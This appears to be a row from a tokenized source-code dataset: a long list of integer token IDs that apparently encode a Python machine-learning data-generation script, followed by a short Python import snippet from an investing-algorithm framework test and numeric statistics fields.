1600,
1037,
2625,
43055,
284,
5072,
3696,
1600,
2672,
28,
17821,
11,
2099,
28,
2536,
8,
628,
198,
220,
220,
220,
26498,
796,
30751,
13,
29572,
62,
22046,
3419,
628,
220,
220,
220,
4605,
62,
260,
1676,
6077,
2247,
7,
22046,
13,
28826,
8,
198,
220,
220,
220,
1303,
4091,
611,
29369,
5631,
1695,
198,
220,
220,
220,
3335,
796,
28034,
13,
25202,
7203,
36166,
4943,
198,
220,
220,
220,
611,
28034,
13,
66,
15339,
13,
271,
62,
15182,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
44357,
319,
11362,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
3335,
796,
28034,
13,
25202,
7203,
66,
15339,
25,
15,
4943,
628,
220,
220,
220,
1303,
31122,
198,
220,
220,
220,
299,
34431,
796,
599,
1590,
13,
2220,
10786,
268,
62,
7295,
62,
36216,
62,
9132,
11537,
198,
220,
220,
220,
1303,
1195,
38,
2746,
9058,
198,
220,
220,
220,
10662,
70,
62,
19849,
796,
26498,
13,
80,
70,
62,
19849,
62,
3672,
198,
220,
220,
220,
10662,
70,
62,
30001,
7509,
796,
11160,
30642,
7509,
13,
6738,
62,
5310,
13363,
7,
80,
70,
62,
19849,
8,
198,
220,
220,
220,
10662,
70,
62,
19849,
796,
11160,
17633,
1890,
4653,
80,
17,
4653,
80,
31288,
13,
6738,
62,
5310,
13363,
7,
80,
70,
62,
19849,
8,
198,
220,
220,
220,
1303,
1195,
17,
34,
2746,
9058,
198,
220,
220,
220,
10662,
17,
66,
62,
19849,
796,
26498,
13,
80,
17,
66,
62,
19849,
62,
3672,
198,
220,
220,
220,
10662,
17,
66,
62,
30001,
7509,
796,
11160,
30642,
7509,
13,
6738,
62,
5310,
13363,
7,
80,
17,
66,
62,
19849,
8,
198,
220,
220,
220,
10662,
17,
66,
62,
19849,
796,
11160,
17633,
1890,
4653,
80,
17,
4653,
80,
31288,
13,
6738,
62,
5310,
13363,
7,
80,
17,
66,
62,
19849,
8,
198,
220,
220,
220,
1303,
10029,
2746,
9058,
198,
220,
220,
220,
277,
66,
62,
30001,
7509,
796,
11160,
30642,
7509,
13,
6738,
62,
5310,
13363,
7,
22046,
13,
16072,
62,
19849,
62,
3672,
8,
628,
220,
220,
220,
277,
66,
62,
19849,
796,
16798,
10044,
6111,
9487,
7483,
7,
22046,
13,
16072,
62,
19849,
62,
3672,
11,
28119,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
657,
13,
15,
8,
198,
220,
220,
220,
1181,
62,
11600,
796,
28034,
13,
2220,
7,
22046,
13,
16072,
62,
19849,
62,
9122,
4122,
8,
198,
220,
220,
220,
1303,
7646,
796,
3991,
780,
286,
275,
861,
13,
20521,
67,
654,
13,
9150,
62,
2340,
46318,
198,
220,
220,
220,
277,
66,
62,
19849,
13,
2220,
62,
5219,
62,
11600,
7,
5219,
62,
11600,
11,
7646,
28,
25101,
8,
628,
220,
220,
220,
1303,
15417,
2746,
329,
4633,
1624,
5270,
198,
220,
220,
220,
300,
76,
796,
11160,
17633,
1890,
24334,
6775,
31288,
13,
6738,
62,
5310,
13363,
10786,
70,
457,
17,
11537,
198,
220,
220,
220,
300,
76,
62,
30488,
796,
11160,
30642,
7509,
13,
6738,
62,
5310,
13363,
10786,
70,
457,
17,
11537,
628,
220,
220,
220,
1303,
7804,
2235,
5660,
399,
1137,
319,
5128,
198,
220,
220,
220,
351,
1280,
7,
22046,
13,
27432,
62,
47992,
1817,
8,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
15433,
1817,
796,
685,
17752,
13,
46030,
7,
75,
8,
329,
300,
287,
277,
60,
198,
220,
220,
220,
351,
1280,
7,
22046,
13,
2100,
62,
47992,
1817,
8,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1188,
62,
47992,
1817,
796,
685,
17752,
13,
46030,
7,
75,
8,
329,
300,
287,
277,
60,
198,
220,
220,
220,
351,
1280,
7,
22046,
13,
9288,
62,
47992,
1817,
8,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1332,
62,
47992,
1817,
796,
685,
17752,
13,
46030,
7,
75,
8,
329,
300,
287,
277,
60,
198,
220,
220,
220,
17156,
62,
7890,
796,
17635,
198,
220,
220,
220,
5072,
62,
6604,
82,
796,
17635,
198,
220,
220,
220,
611,
407,
28686,
13,
6978,
13,
1069,
1023,
7,
69,
1,
90,
22046,
13,
22915,
62,
15908,
36786,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
28686,
13,
76,
4335,
17062,
7,
69,
1,
90,
22046,
13,
22915,
62,
15908,
92,
4943,
628,
220,
220,
220,
3613,
62,
15908,
796,
277,
1,
90,
22046,
13,
22915,
62,
15908,
36786,
628,
220,
220,
220,
1808,
62,
5235,
62,
15414,
796,
651,
62,
13190,
62,
298,
871,
7,
47992,
1817,
11,
299,
34431,
8,
198,
220,
220,
220,
1188,
62,
25652,
62,
5235,
62,
15414,
796,
651,
62,
13190,
62,
298,
871,
7,
2100,
62,
47992,
1817,
11,
299,
34431,
8,
198,
220,
220,
220,
1332,
62,
25652,
62,
5235,
62,
15414,
796,
651,
62,
13190,
62,
298,
871,
7,
9288,
62,
47992,
1817,
11,
299,
34431,
8,
628,
220,
220,
220,
1303,
7804,
21017,
2980,
378,
2683,
422,
399,
1137,
198,
220,
220,
220,
10662,
70,
62,
19849,
13,
1462,
7,
25202,
8,
198,
220,
220,
220,
662,
41341,
796,
13027,
7,
80,
70,
62,
7890,
62,
3866,
14681,
11,
10662,
70,
62,
30001,
7509,
11,
705,
12001,
11537,
198,
220,
220,
220,
2429,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
25652,
62,
5235,
62,
15414,
8,
198,
220,
220,
220,
1188,
62,
5235,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
2100,
62,
25652,
62,
5235,
62,
15414,
8,
198,
220,
220,
220,
1332,
62,
5235,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
9288,
62,
25652,
62,
5235,
62,
15414,
8,
628,
220,
220,
220,
1303,
25853,
4814,
399,
1137,
198,
220,
220,
220,
1303,
5235,
62,
67,
2617,
62,
8692,
796,
2429,
62,
67,
2617,
62,
8692,
13,
24455,
7,
50033,
1672,
25,
18896,
7,
20688,
17816,
504,
86,
364,
6,
12962,
1875,
657,
8,
198,
220,
220,
220,
2429,
62,
67,
2617,
796,
2429,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
198,
220,
220,
220,
1188,
62,
5235,
62,
67,
2617,
796,
1188,
62,
5235,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
198,
220,
220,
220,
1332,
62,
5235,
62,
67,
2617,
796,
1332,
62,
5235,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
628,
220,
220,
220,
1366,
62,
26000,
1352,
796,
6060,
22667,
1352,
1890,
4653,
80,
17,
4653,
80,
7,
198,
220,
220,
220,
220,
220,
220,
220,
10662,
70,
62,
30001,
7509,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
28,
80,
70,
62,
19849,
11,
198,
220,
220,
220,
220,
220,
220,
220,
6167,
62,
15636,
62,
30001,
62,
312,
10779,
3064,
11,
198,
220,
220,
220,
220,
220,
220,
220,
24511,
11639,
6511,
395,
6,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
10662,
70,
62,
2213,
10613,
796,
8562,
2898,
10613,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
28,
80,
70,
62,
19849,
11,
198,
220,
220,
220,
220,
220,
220,
220,
11241,
7509,
28,
80,
70,
62,
30001,
7509,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
62,
26000,
1352,
28,
7890,
62,
26000,
1352,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
1624,
62,
5235,
62,
15414,
796,
1057,
62,
25652,
62,
20158,
7,
80,
70,
62,
2213,
10613,
11,
2429,
62,
67,
2617,
11,
10662,
70,
62,
19849,
11,
10662,
70,
62,
30001,
7509,
11,
3335,
11,
26498,
13,
22510,
62,
1350,
4105,
8,
198,
220,
220,
220,
1188,
62,
6604,
62,
5235,
62,
15414,
796,
1057,
62,
25652,
62,
20158,
7,
80,
70,
62,
2213,
10613,
11,
1188,
62,
5235,
62,
67,
2617,
11,
10662,
70,
62,
19849,
11,
10662,
70,
62,
30001,
7509,
11,
3335,
11,
26498,
13,
22510,
62,
1350,
4105,
8,
198,
220,
220,
220,
1332,
62,
6604,
62,
5235,
62,
15414,
796,
1057,
62,
25652,
62,
20158,
7,
80,
70,
62,
2213,
10613,
11,
1332,
62,
5235,
62,
67,
2617,
11,
10662,
70,
62,
19849,
11,
10662,
70,
62,
30001,
7509,
11,
3335,
11,
26498,
13,
22510,
62,
1350,
4105,
8,
628,
220,
220,
220,
10662,
70,
62,
19849,
13,
1462,
10786,
36166,
11537,
628,
220,
220,
220,
1303,
7804,
21017,
2980,
378,
3667,
422,
2683,
198,
220,
220,
220,
10662,
17,
66,
62,
19849,
13,
1462,
7,
25202,
8,
198,
220,
220,
220,
662,
41341,
796,
13027,
7,
80,
17,
66,
62,
7890,
62,
3866,
14681,
11,
10662,
17,
66,
62,
30001,
7509,
11,
705,
47992,
413,
1506,
11537,
198,
220,
220,
220,
2429,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
6604,
62,
5235,
62,
15414,
8,
198,
220,
220,
220,
1188,
62,
5235,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
2100,
62,
6604,
62,
5235,
62,
15414,
8,
198,
220,
220,
220,
1332,
62,
5235,
62,
67,
2617,
62,
8692,
796,
16092,
292,
316,
13,
6738,
62,
11600,
7,
9288,
62,
6604,
62,
5235,
62,
15414,
8,
628,
220,
220,
220,
2429,
62,
67,
2617,
796,
2429,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
198,
220,
220,
220,
1188,
62,
5235,
62,
67,
2617,
796,
1188,
62,
5235,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
198,
220,
220,
220,
1332,
62,
5235,
62,
67,
2617,
796,
1332,
62,
5235,
62,
67,
2617,
62,
8692,
13,
8899,
7,
3866,
41341,
11,
7365,
1740,
28,
17821,
8,
198,
220,
220,
220,
1366,
62,
26000,
1352,
796,
6060,
22667,
1352,
1890,
4653,
80,
17,
4653,
80,
7,
198,
220,
220,
220,
220,
220,
220,
220,
10662,
17,
66,
62,
30001,
7509,
11,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
28,
80,
17,
66,
62,
19849,
11,
198,
220,
220,
220,
220,
220,
220,
220,
6167,
62,
15636,
62,
30001,
62,
312,
10779,
3064,
11,
198,
220,
220,
220,
220,
220,
220,
220,
24511,
11639,
6511,
395,
6,
198,
220,
220,
220,
1267,
198,
220,
220,
220,
10662,
17,
66,
62,
2213,
10613,
796,
8562,
2898,
10613,
7,
198,
220,
220,
220,
220,
220,
220,
220,
2746,
28,
80,
17,
66,
62,
19849,
11,
198,
220,
220,
220,
220,
220,
220,
220,
11241,
7509,
28,
80,
17,
66,
62,
30001,
7509,
11,
198,
220,
220,
220,
220,
220,
220,
220,
1366,
62,
26000,
1352,
28,
7890,
62,
26000,
1352,
198,
220,
220,
220,
1267,
628,
220,
220,
220,
7560,
62,
6604,
82,
11,
277,
66,
62,
6604,
62,
15414,
82,
796,
1057,
62,
6604,
62,
20158,
7,
80,
17,
66,
62,
2213,
10613,
11,
2429,
62,
67,
2617,
11,
10662,
17,
66,
62,
19849,
11,
10662,
17,
66,
62,
30001,
7509,
11,
3335,
11,
26498,
13,
22510,
62,
1350,
4105,
8,
198,
220,
220,
220,
1188,
62,
27568,
62,
6604,
82,
11,
4808,
796,
1057,
62,
6604,
62,
20158,
7,
80,
17,
66,
62,
2213,
10613,
11,
1188,
62,
5235,
62,
67,
2617,
11,
10662,
17,
66,
62,
19849,
11,
10662,
17,
66,
62,
30001,
7509,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3335,
11,
26498,
13,
22510,
62,
1350,
4105,
8,
198,
220,
220,
220,
1332,
62,
27568,
62,
6604,
82,
11,
4808,
796,
1057,
62,
6604,
62,
20158,
7,
80,
17,
66,
62,
2213,
10613,
11,
1332,
62,
5235,
62,
67,
2617,
11,
10662,
17,
66,
62,
19849,
11,
10662,
17,
66,
62,
30001,
7509,
11,
3335,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
26498,
13,
22510,
62,
1350,
4105,
8,
628,
220,
220,
220,
351,
1280,
7,
69,
1,
90,
21928,
62,
15908,
92,
14,
22915,
62,
9288,
62,
6604,
82,
13,
17752,
75,
1600,
705,
46569,
11537,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
269,
287,
1332,
62,
27568,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
13,
13564,
7,
17752,
13,
67,
8142,
7,
66,
8,
1343,
705,
59,
77,
11537,
198,
220,
220,
220,
351,
1280,
7,
69,
1,
90,
21928,
62,
15908,
92,
14,
22915,
62,
1416,
29660,
62,
7959,
62,
6604,
82,
13,
17752,
75,
1600,
705,
46569,
11537,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
269,
287,
1188,
62,
27568,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
13,
13564,
7,
17752,
13,
67,
8142,
7,
66,
8,
1343,
705,
59,
77,
11537,
628,
220,
220,
220,
10662,
17,
66,
62,
19849,
13,
1462,
10786,
36166,
11537,
198,
220,
220,
220,
1303,
5660,
10029,
2746,
198,
220,
220,
220,
277,
66,
62,
19849,
13,
1462,
7,
25202,
8,
198,
220,
220,
220,
1303,
51,
3727,
46,
651,
262,
1366,
656,
262,
826,
5794,
198,
220,
220,
220,
277,
66,
62,
7959,
62,
2617,
796,
10286,
29054,
10044,
6111,
33,
963,
27354,
292,
316,
7,
22046,
13,
22615,
62,
10215,
79,
385,
62,
7753,
11,
277,
66,
62,
6604,
62,
15414,
82,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
41767,
62,
30001,
28,
16072,
62,
30001,
7509,
13,
325,
79,
62,
30001,
11,
479,
28,
15,
11,
4512,
28,
25101,
8,
628,
220,
220,
220,
25738,
62,
28764,
9278,
11,
12046,
62,
28764,
82,
11,
12046,
62,
1416,
2850,
796,
4331,
7,
16072,
62,
19849,
11,
277,
66,
62,
7959,
62,
2617,
11,
1467,
11,
26498,
13,
16072,
62,
19849,
62,
3672,
11,
277,
66,
62,
30001,
7509,
11,
3335,
8,
198,
220,
220,
220,
25738,
62,
17752,
796,
25738,
17,
17752,
7,
16072,
62,
7959,
62,
2617,
13,
82,
12629,
11,
25738,
62,
28764,
9278,
8,
198,
220,
220,
220,
12046,
62,
17752,
796,
12046,
17,
17752,
7,
16072,
62,
7959,
62,
2617,
13,
82,
12629,
11,
12046,
62,
28764,
82,
11,
12046,
62,
1416,
2850,
8,
198,
220,
220,
220,
12046,
62,
17752,
796,
1281,
62,
14681,
62,
301,
590,
7,
20310,
68,
62,
17752,
11,
12046,
62,
17752,
8,
198,
220,
220,
220,
23791,
62,
17752,
796,
20121,
62,
17752,
7,
20310,
68,
62,
17752,
11,
12046,
62,
17752,
8,
198,
220,
220,
220,
277,
66,
62,
19849,
13,
1462,
10786,
36166,
11537,
198,
220,
220,
220,
1303,
10916,
16277,
198,
220,
220,
220,
23243,
62,
16072,
62,
6604,
82,
796,
3297,
62,
16072,
62,
6604,
82,
7,
647,
2004,
62,
17752,
11,
7560,
62,
6604,
82,
8,
198,
220,
220,
220,
1303,
3497,
649,
12066,
198,
220,
220,
220,
15433,
590,
62,
26858,
62,
8899,
796,
4277,
11600,
7,
50033,
25,
1391,
6,
5239,
10354,
705,
3256,
705,
298,
871,
10354,
17635,
30072,
198,
220,
220,
220,
2656,
62,
6604,
82,
796,
685,
66,
329,
269,
287,
23243,
62,
16072,
62,
6604,
82,
611,
269,
17816,
26675,
20520,
1875,
657,
13,
20,
60,
198,
220,
220,
220,
329,
269,
287,
2656,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
15433,
590,
62,
26858,
62,
8899,
58,
66,
17816,
312,
20520,
7131,
6,
5239,
20520,
796,
269,
17816,
66,
42942,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
15433,
590,
62,
26858,
62,
8899,
58,
66,
17816,
312,
20520,
7131,
6,
298,
871,
6,
4083,
33295,
7,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
357,
66,
17816,
41484,
6,
7131,
6,
9688,
6,
4357,
269,
17816,
41484,
6,
7131,
6,
9688,
20520,
1343,
18896,
7,
66,
17816,
41484,
6,
7131,
6,
5239,
20520,
828,
705,
3525,
9050,
6,
4008,
198,
220,
220,
220,
5072,
62,
6604,
82,
13,
2302,
437,
7,
14986,
62,
6604,
82,
8,
198,
220,
220,
220,
15433,
1817,
796,
685,
66,
329,
269,
287,
15433,
1817,
611,
269,
17816,
15390,
62,
312,
20520,
407,
287,
15433,
590,
62,
26858,
62,
8899,
60,
628,
198,
220,
220,
220,
5072,
62,
6604,
82,
13,
2302,
437,
26933,
66,
329,
269,
287,
23243,
62,
16072,
62,
6604,
82,
611,
269,
17816,
26675,
20520,
19841,
657,
13,
20,
12962,
628,
220,
220,
220,
351,
1280,
7,
69,
1,
90,
21928,
62,
15908,
92,
14,
29373,
62,
6604,
82,
13,
17752,
75,
1600,
705,
46569,
11537,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
329,
269,
287,
5072,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
13,
13564,
7,
17752,
13,
67,
8142,
7,
66,
8,
1343,
705,
59,
77,
11537,
628,
220,
220,
220,
269,
21370,
62,
448,
796,
17635,
198,
220,
220,
220,
329,
269,
287,
5072,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
269,
21370,
62,
448,
13,
33295,
26933,
66,
17816,
22866,
6,
4357,
269,
17816,
66,
42942,
6,
4357,
269,
17816,
27568,
62,
6604,
6,
4357,
269,
17816,
26675,
6,
11907,
8,
198,
220,
220,
220,
269,
21370,
62,
30094,
796,
279,
67,
13,
6601,
19778,
7,
40664,
62,
448,
11,
15180,
28,
17816,
21947,
3256,
705,
20556,
11352,
594,
3256,
705,
44819,
3256,
705,
26595,
6,
12962,
198,
220,
220,
220,
269,
21370,
62,
30094,
13,
1462,
62,
40664,
7,
69,
1,
90,
21928,
62,
15908,
92,
14,
28282,
62,
6604,
82,
13,
40664,
1600,
6376,
28,
14202,
8,
628,
220,
220,
220,
1303,
2980,
378,
3047,
1366,
329,
1109,
10627,
198,
220,
220,
220,
299,
4528,
796,
11523,
10786,
34086,
3681,
12,
20930,
3256,
2746,
11639,
305,
4835,
64,
12,
11664,
12,
10295,
4528,
3256,
1441,
62,
439,
62,
1416,
2850,
28,
17821,
11,
3335,
28,
15,
8,
628,
220,
220,
220,
1303,
2980,
378,
1366,
329,
629,
29660,
3047,
14,
18206,
2288,
198,
220,
220,
220,
329,
1624,
62,
2617,
287,
256,
80,
36020,
7,
9288,
62,
27568,
62,
6604,
82,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
2469,
62,
6604,
82,
796,
479,
8800,
26933,
6604,
62,
2617,
17816,
27568,
62,
6604,
20520,
4357,
299,
4528,
11,
300,
76,
11,
300,
76,
62,
30488,
11,
3335,
11,
513,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1624,
62,
2617,
17816,
12480,
62,
6604,
20520,
796,
2469,
62,
6604,
82,
58,
15,
7131,
17,
60,
611,
2469,
62,
6604,
82,
58,
15,
60,
318,
407,
6045,
2073,
6045,
198,
220,
220,
220,
1303,
3497,
35789,
523,
356,
460,
2298,
4633,
8405,
329,
10635,
40,
198,
220,
220,
220,
3348,
62,
312,
62,
1462,
62,
20360,
796,
4277,
11600,
7,
4868,
8,
198,
220,
220,
220,
351,
1280,
7,
22046,
13,
32538,
62,
10215,
79,
385,
62,
7753,
8,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
300,
287,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1366,
796,
33918,
13,
46030,
7,
75,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3348,
62,
312,
796,
1366,
17816,
15390,
62,
312,
6,
4083,
35312,
10786,
62,
11537,
58,
15,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3348,
62,
312,
62,
1462,
62,
20360,
58,
20189,
62,
312,
4083,
33295,
7,
7890,
8,
628,
198,
220,
220,
220,
1303,
12346,
352,
14,
18,
284,
307,
6971,
11,
352,
14,
18,
284,
307,
40081,
11,
290,
352,
14,
18,
284,
307,
10635,
40,
628,
198,
220,
220,
220,
753,
796,
753,
5235,
3419,
198,
220,
220,
220,
2779,
62,
6604,
82,
62,
392,
62,
46817,
796,
17635,
198,
220,
220,
220,
329,
1624,
62,
2617,
287,
1332,
62,
27568,
62,
6604,
82,
25,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
17220,
4522,
35488,
284,
651,
2656,
3348,
4522,
198,
220,
220,
220,
220,
220,
220,
220,
2656,
62,
15390,
62,
312,
796,
1624,
62,
2617,
17816,
312,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
2656,
62,
15390,
62,
312,
796,
2656,
62,
15390,
62,
312,
58,
25,
14986,
62,
15390,
62,
312,
13,
81,
19796,
10786,
62,
11537,
60,
628,
220,
220,
220,
220,
220,
220,
220,
1426,
62,
6604,
796,
1624,
62,
2617,
17816,
27568,
62,
6604,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
2469,
62,
6604,
796,
1624,
62,
2617,
17816,
12480,
62,
6604,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
2099,
796,
4738,
13,
25192,
600,
7,
15,
11,
362,
8,
198,
220,
220,
220,
220,
220,
220,
220,
611,
2099,
6624,
657,
393,
2469,
62,
6604,
6624,
6045,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2779,
62,
6604,
82,
62,
392,
62,
46817,
13,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
1306,
7,
1939,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6604,
10354,
1426,
62,
6604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
1391,
2536,
7,
15390,
62,
312,
2599,
685,
90,
6,
34086,
3007,
10354,
685,
15,
4357,
705,
18242,
10354,
705,
40331,
15490,
6,
92,
60,
329,
2205,
62,
312,
287,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1624,
62,
2617,
17816,
46817,
20520,
5512,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
863,
62,
15390,
62,
2340,
10354,
1624,
62,
2617,
17816,
46817,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2099,
6624,
352,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2779,
62,
6604,
82,
62,
392,
62,
46817,
13,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
1306,
7,
1939,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6604,
10354,
2469,
62,
6604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
1391,
2536,
7,
15390,
62,
312,
2599,
685,
90,
6,
34086,
3007,
10354,
685,
15,
4357,
705,
18242,
10354,
705,
10943,
5446,
2885,
18379,
6,
92,
60,
329,
2205,
62,
312,
287,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1624,
62,
2617,
17816,
46817,
20520,
5512,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
863,
62,
15390,
62,
2340,
10354,
1624,
62,
2617,
17816,
46817,
20520,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
220,
220,
220,
220,
1288,
361,
2099,
6624,
362,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
497,
72,
62,
4906,
796,
4738,
13,
25192,
600,
7,
15,
11,
352,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
611,
497,
72,
62,
4906,
6624,
657,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2779,
62,
6604,
82,
62,
392,
62,
46817,
13,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
1306,
7,
1939,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6604,
10354,
1426,
62,
6604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
1391,
5512,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
863,
62,
15390,
62,
2340,
10354,
685,
14986,
62,
15390,
62,
312,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2073,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
2779,
62,
6604,
82,
62,
392,
62,
46817,
13,
33295,
15090,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
312,
10354,
1306,
7,
1939,
828,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
6604,
10354,
2469,
62,
6604,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
46817,
10354,
1391,
5512,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
705,
66,
863,
62,
15390,
62,
2340,
10354,
685,
14986,
62,
15390,
62,
312,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
32092,
198,
220,
220,
220,
351,
1280,
7,
69,
1,
90,
21928,
62,
15908,
92,
14,
1416,
29660,
62,
6604,
82,
13,
17752,
75,
1600,
705,
46569,
11537,
355,
277,
25,
198,
220,
220,
220,
220,
220,
220,
220,
329,
269,
287,
2779,
62,
6604,
82,
62,
392,
62,
46817,
25,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
277,
13,
13564,
7,
17752,
13,
67,
8142,
7,
66,
8,
1343,
705,
59,
77,
11537,
198
] | 2.263693 | 9,841 |
from typing import List
from investing_algorithm_framework import SQLLitePortfolioManager, Position, \
Order
from investing_algorithm_framework.core.exceptions import OperationalException
from investing_algorithm_framework.core.models import AssetPrice
from tests.resources import TestBase
| [
6738,
19720,
1330,
7343,
198,
198,
6738,
14771,
62,
282,
42289,
62,
30604,
1330,
49747,
3069,
578,
13924,
13652,
13511,
11,
23158,
11,
3467,
198,
220,
220,
220,
8284,
198,
6738,
14771,
62,
282,
42289,
62,
30604,
13,
7295,
13,
1069,
11755,
1330,
6564,
864,
16922,
198,
6738,
14771,
62,
282,
42289,
62,
